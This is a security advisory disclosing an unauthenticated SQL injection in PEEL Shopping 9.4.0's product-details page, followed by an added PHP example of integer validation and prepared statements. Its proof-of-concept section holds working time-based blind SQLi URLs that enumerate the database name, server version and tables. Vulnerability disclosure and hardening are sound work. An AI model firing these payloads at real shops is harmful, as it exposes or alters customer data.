This was due to a change of structure to get product details, in order to potentially link it to a product API instead of reading data from MySQL.
The previously implemented protection was no longer active, so it was necessary to add an intval on the GET parameter.
Vulnerability Name: SQL Injection in "produit_details.php?id" parameter
Date of Discovery: 10 July 2021
Product version: 9.4.0. Download link
Author: faisalfs10x
Vulnerability Description: A public user/guest (unauthenticated) can inject a malicious SQL query in order to affect the execution of predefined SQL commands via the "id" parameter on the "/peel-shopping_9_4_0/achat/produit_details.php?id=[SQLi]" endpoint. Upon a successful SQL injection attack, an attacker can read sensitive data from the database or modify database data.
Vulnerable URL: http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=[SQLi]
Proof of Concept:
1) Assuming the out-of-the-box peel-shopping_9_4_0 installation database name is peel, this query checks whether the database() name is LIKE hex(%peel%): it delays for 7 seconds before redirecting to the homepage (http://localhost/peel-shopping_9_4_0/), which indicates a TRUE SQL statement, meaning the database name is like "peel".
url : http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(7-(IF(DATABASE()+LIKE+0x257065656c25,0,5)))))FSXX)
[PoC enum db name]

2) Assuming the web application uses a MariaDB database server, this checks whether the DB version is LIKE hex(%MariaDB%); it delays for 5 seconds if TRUE.
url : http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(5-(IF(VERSION()+LIKE+0x254d61726961444225,0,5)))))FSXX)
[Poc enum MariaDB]

3) By default, the database has a table named peel_produits. This query checks whether the table peel_produits exists; it delays for 10 seconds if TRUE, otherwise it redirects to the homepage instantly.
url : http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(10-(IF(EXISTS(SELECT+3+FROM+peel.peel_produits),0,5)))))FSXX)
[PoC enum table peel_produits]

To produce an SQL syntax error, it is possible to intercept the request before it is redirected to the homepage using a tool like Burp Suite (Repeater).
Error syntax: http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELdECT(SLEEP(3-(IF(USER()+LIKE+0xGEN_ERROR,0,5)))))ERR)
[MariaDB disclosed image]

[peel_produits table_name disclosed]

Dump table name = peel_profil
Consequences:
Confidentiality: Since SQL databases generally hold sensitive data, loss of confidentiality is a frequent problem with SQL injection vulnerabilities.
Integrity: Just as it may be possible to read sensitive information, e.g. client/customer data, it is also possible to make changes to or even delete this information with an SQL injection attack.
Mitigation: Use prepared statements (with parameterized queries). It would also be good to cast to integer to ensure only numerical data is accepted in the 'id' parameter, e.g. intval($_GET['id']).
cc @advisto
References for mitigating the vulnerability: https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
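The two mitigations named in the report (integer casting and a prepared statement) as an added PHP example; this is not PEEL Shopping's code nor the reporter's. The column names (nom, prix), the function names, and the use of an in-memory SQLite database for the runnable demonstration are assumptions; the real product reads MySQL/MariaDB, but PDO binding works the same way there.

```php
<?php
// Added example (not PEEL Shopping's own code): hardening an "id" lookup
// such as produit_details.php?id=... against SQL injection.
// Table name peel_produits comes from the report; column names nom/prix
// and the function names are hypothetical.

declare(strict_types=1);

/**
 * Vulnerable pattern, shown for contrast only: the raw GET value is
 * concatenated into the SQL text, so whatever follows "id=" becomes SQL.
 */
function buildProductQueryUnsafe(string $rawId): string
{
    return "SELECT id, nom, prix FROM peel_produits WHERE id = " . $rawId;
}

/**
 * Mitigation step 1: accept only a plain positive integer.
 * ctype_digit() rejects anything containing parentheses, letters or
 * spaces, and intval() turns the remaining digits into an int. A null
 * result lets the caller return 404 without touching the database.
 */
function parseProductId(?string $rawId): ?int
{
    if ($rawId === null || $rawId === '' || !ctype_digit($rawId)) {
        return null;
    }
    $id = intval($rawId);
    return $id > 0 ? $id : null;
}

/**
 * Mitigation step 2: bind the value instead of interpolating it.
 * The SQL text is fixed at prepare() time; the driver sends the integer
 * separately, so it can never alter the statement's structure.
 */
function fetchProduct(PDO $db, ?string $rawId): ?array
{
    $id = parseProductId($rawId);
    if ($id === null) {
        return null;
    }
    $stmt = $db->prepare(
        'SELECT id, nom, prix FROM peel_produits WHERE id = :id LIMIT 1'
    );
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Demonstration on a constructed in-memory SQLite database (sample data).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE peel_produits (id INTEGER PRIMARY KEY, nom TEXT, prix REAL)');
$db->exec("INSERT INTO peel_produits VALUES (1, 'Sample product', 9.99)");

// Input shaped like the report's time-based probe (URL-decoded form).
$probe = '(SELECT 1337 FROM (SELECT(SLEEP(7-(IF(DATABASE() LIKE 0x257065656c25,0,5)))))FSXX)';

// With the unsafe builder the probe becomes part of the SQL text.
echo buildProductQueryUnsafe($probe), PHP_EOL;

// With the hardened path the probe is rejected before any query runs.
var_dump(parseProductId($probe));        // NULL
var_dump(parseProductId('1'));           // int(1)
var_dump(parseProductId('1 OR 1=1'));    // NULL (space and letters fail ctype_digit)
print_r(fetchProduct($db, '1'));         // the sample row
var_dump(fetchProduct($db, $probe));     // NULL, no statement executed
```

Either step alone already closes the reported hole; doing both is the defence-in-depth the OWASP cheat sheet recommends, and it also removes the 7-second delay signal, because a SLEEP() expression can no longer reach the database at all.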